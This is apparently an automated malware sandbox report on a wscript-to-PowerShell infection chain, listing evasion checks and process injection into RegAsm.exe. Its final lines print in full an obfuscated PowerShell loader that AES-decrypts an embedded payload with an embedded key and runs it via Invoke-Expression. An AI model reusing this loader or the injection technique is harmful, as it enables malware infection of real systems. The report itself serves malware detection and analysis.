                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040F7A7 Sleep,ExitProcess,4_2_0040F7A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_0041A748
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3938Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5942Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 6883Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 3110Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3752Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6720Thread sleep count: 6883 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6720Thread sleep time: -20649000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6720Thread sleep count: 3110 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6720Thread sleep time: -9330000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409253
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041C291
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040C34D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00409665
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044E879 FindFirstFileExA,4_2_0044E879
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_0040880C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040783C FindFirstFileW,FindNextFileW,4_2_0040783C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419AF5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040BB30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040BD37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407C97
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000002.00000002.1364248162.000002463B8F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
                  Source: RegAsm.exe, 00000004.00000002.2488829216.00000000012A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: RegAsm.exe, 00000004.00000002.2488829216.000000000122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_4-48857
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004349F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041CB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004432B5 mov eax, dword ptr fs:[00000030h]4_2_004432B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00412077 GetProcessHeap,HeapFree,4_2_00412077
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004349F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00434B47 SetUnhandledExceptionFilter,4_2_00434B47
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043BB22
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00434FDC

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: amsi64_3092.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi64_3092.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTR
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D1D008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe4_2_004120F7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419627 mouse_event,4_2_00419627
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni31045819173442745210226027008389cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cnigrotij99moqal/1g6m0vqbtznqapocvjw7wdfeq2dm55mrrbsdl2dtjprdivh4qro9tuowqh9vuvcwhvl7wdpldrvycvslbshkyytx3y3ec19qglil2fuyxvsxhxzrcpixvhsexgj/yljqnpmqcrbgfmq7b0x+qtytuccqp+5yobn4o6atlpw9w8pphk9ote6qu1yd4u4i80cm5mu98/pr4+8ywarzuake5pec8m1o4ku1/sjpgmlsinidtnfgago2s309dviv/fktnnaxjjczmr5wdbqltftgucrdeglc3qbcwcpmgt1xj0gl7ve4guk6hudnkbarvx6ie3asacjsl8un9o0ykkxzeyqfjy1x6z5q3ahy4xxler3uligmmxvv2bdi4uge5zccvgmzwalk6a/59+vdpw/eapul514/a+us8pix4u0jpotd/fdvcmst/nbk2n2paq0ehkxxmwpkzka1e+bupnxwxjrfwegtderivzkg4xcqmje/dz1h6bw6vof7gbpcwnfhiokyilaudebwjqtctwrqxdrxo3beibt1ie51b3ojwza1v/g2n2t89fwu55ux7+dxeif/o2omp2w4bjqawne2xjfpmi8ocuacfhimyruwu1jgqqlc20g1wdpryvchmu/6wcfwkazbxu2z+dc8hojblkiz6g02yryv03hspeacrw1wogownnx9nylir6qgyzdyysjqrzgvzx2ed0jey/v4hsh4zkwvsy3946yvczswufkgbbcphd+j/kkl82m6zpli5i+j/so2di9yy5g1lqwpa/f21tffwnalsnppwzdiwdaugc2jlgps7d7owmpgn6mz5cocsw9nz1uoebwavfax+orkq5t4pfhdwuspge1kn0mwhl53hcv2snx7vyyfspzt6nky++2xtpexo+wxcnj2u+k0vmb0gqkc/f4jauzcgmbcbllrbx1lnogrnjowqzo7twoygr6yzl5mr1kk76wixljptroolwxocba09by8f2v9p+azjutmbcghanfiiqjywdooeg0zffos+sgi2tr+sgif31xzrdk5tgul9q7whomauh7x8xesjy8ba38e/dcsfumybe7hv40jaxlgvj3rxji2pnkh2p8jplmkdconw2rmaifaywegmrghtt4k1orkvfzi3ejd4zgs2+rdvimcp4nnw8svqhy+eqiqx/8s1jdct0kgyff8i88r+i3xtrgou+2myson8qoxrya6lglkmbykehjvocpgxrcea62jbr2pobuyxqet4x+bgr9daceefuc/8bcku+6sz5tmxp6ohd/vz3jrhmzp4kn+c5qykbc0qhxnluox3at07cgywnetpccgfxkeyp13rjbbznm31t6eljuhqkbjgimzumgkiixsu8zm9izo0koxrbn8gap3xwegprlq==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
